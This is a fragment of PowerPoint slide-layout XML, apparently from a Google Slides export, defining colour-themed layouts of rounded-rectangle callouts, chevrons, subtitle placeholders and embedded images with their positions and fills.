            <p:cNvPr id="389" name="Google Shape;38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90" name="Google Shape;39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1" name="Google Shape;391;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="43112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2" name="Google Shape;392;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179063" y="299663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3" name="Google Shape;393;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="394" name="Google Shape;39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5" name="Google Shape;39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txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="299675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97" name="Google Shape;397;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178950" y="343473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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="399" name="Google Shape;39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00" name="Google Shape;40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24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="3434875"/>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2" name="Google Shape;402;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179088" y="2135259"/>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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="404" name="Google Shape;404;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1D7E7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5" name="Google Shape;405;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="333375" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1D7E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6" name="Google Shape;406;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="213537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7" name="Google Shape;407;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178975" y="2573363"/>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24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="409" name="Google Shape;409;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="21294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10" name="Google Shape;410;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="333375" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2129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 name="Google Shape;411;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2573500"/>
            <a:ext cx="88821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2" name="Google Shape;412;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179038" y="1258884"/>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24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="414" name="Google Shape;414;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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5" name="Google Shape;415;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1259000"/>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17" name="Google Shape;417;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178925" y="1696988"/>
            <a:ext cx="76911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 name="Google Shape;418;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="419" name="Google Shape;419;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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20" name="Google Shape;420;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1697125"/>
            <a:ext cx="8869800" cy="377100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="13716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3 (Green)">
  <p:cSld name="CUSTOM_2_7_1_5">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="422" name="Shape 422"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="Google Shape;423;p2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24" name="Google Shape;424;p2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25" name="Google Shape;425;p2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26" name="Google Shape;426;p2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27" name="Google Shape;427;p2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28" name="Google Shape;428;p2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29" name="Google Shape;429;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="430" name="Google Shape;430;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F7EF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31" name="Google Shape;431;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F7E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 name="Google Shape;432;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275"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txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275"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4" name="Google Shape;434;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3305156" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="435" name="Google Shape;435;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="AFCA5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36" name="Google Shape;436;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="AFCA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7" name="Google Shape;437;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3572250" y="193777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txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3572250" y="193783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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="439" name="Google Shape;439;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="1345853"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="440" name="Google Shape;440;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4FA78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41" name="Google Shape;441;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4FA7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2" name="Google Shape;442;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1938525"/>
            <a:ext cx="2428500" cy="26628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txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1938587"/>
            <a:ext cx="2371500" cy="2662800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="182875" lIns="182875" spcFirstLastPara="1" rIns="182875" wrap="square" tIns="182875">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2 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_5_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="444" name="Shape 444"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="445" name="Google Shape;445;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286275" y="649650"/>
            <a:ext cx="827450" cy="4115237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Google Shape;446;p2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47" name="Google Shape;447;p2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48" name="Google Shape;448;p2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49" name="Google Shape;449;p2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50" name="Google Shape;450;p2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1" name="Google Shape;451;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="160245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2" name="Google Shape;452;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936274" y="890150"/>
            <a:ext cx="2688300" cy="476700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365C8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53" name="Google Shape;453;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5072469" y="1278938"/>
            <a:ext cx="261029" cy="144694"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtract">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365C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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457246" y="887925"/>
            <a:ext cx="2688300" cy="4767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455" name="Google Shape;455;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="575363" y="1276701"/>
            <a:ext cx="226486" cy="144694"/>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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="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5 (Grey)">
  <p:cSld name="CUSTOM_2_7_1_5_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="457" name="Shape 457"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Google Shape;458;p2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9" name="Google Shape;459;p2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60" name="Google Shape;460;p2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61" name="Google Shape;461;p2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62" name="Google Shape;462;p2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63" name="Google Shape;463;p2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4" name="Google Shape;464;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="12527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465" name="Google Shape;465;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190550" y="12765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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133475" y="12765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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="457188" y="196237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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="876063" y="196237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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7934400" y="193852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470" name="Google Shape;470;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2622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471" name="Google Shape;471;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190931" y="2646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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="2646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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="514338" y="3408225"/>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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="933213" y="3408225"/>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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7991550" y="3384375"/>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476" name="Google Shape;476;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438150" y="4095388"/>
            <a:ext cx="790500" cy="6384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477" name="Google Shape;477;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190931" y="4119238"/>
            <a:ext cx="7477200" cy="590700"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj"/>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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="4119238"/>
            <a:ext cx="7115400" cy="590700"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd fmla="val 5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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="1267550"/>
            <a:ext cx="7434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0" name="Google Shape;480;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1944963"/>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lgn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Google Shape;481;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="264817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2" name="Google Shape;482;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="3394650"/>
            <a:ext cx="9144000" cy="590700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="1554475" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="r">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3" name="Google Shape;483;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="4119225"/>
            <a:ext cx="9168600" cy="5907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pos="288">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="546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Bullets 1–4 (Greens)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="484" name="Shape 484"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="Google Shape;485;p28"/>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87" name="Google Shape;487;p2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488" name="Google Shape;488;p2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489" name="Google Shape;489;p2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490" name="Google Shape;490;p2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491" name="Google Shape;491;p2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2" name="Google Shape;492;p28"/>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3" name="Google Shape;493;p28"/>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7" name="Google Shape;497;p28"/>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98" name="Google Shape;498;p28"/>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99" name="Google Shape;499;p28"/>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00" name="Google Shape;500;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="238" l="0" r="0" t="228"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="501" name="Google Shape;501;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="238" l="0" r="0" t="228"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="502" name="Google Shape;502;p28"/>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Bullets 1–4 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="503" name="Shape 503"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="Google Shape;504;p29"/>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06" name="Google Shape;506;p2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07" name="Google Shape;507;p2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08" name="Google Shape;508;p2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09" name="Google Shape;509;p2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10" name="Google Shape;510;p2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1" name="Google Shape;511;p29"/>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2" name="Google Shape;512;p29"/>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9"/>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9"/>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9"/>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6" name="Google Shape;516;p29"/>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17" name="Google Shape;517;p29"/>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18" name="Google Shape;518;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="519" name="Google Shape;519;p29"/>
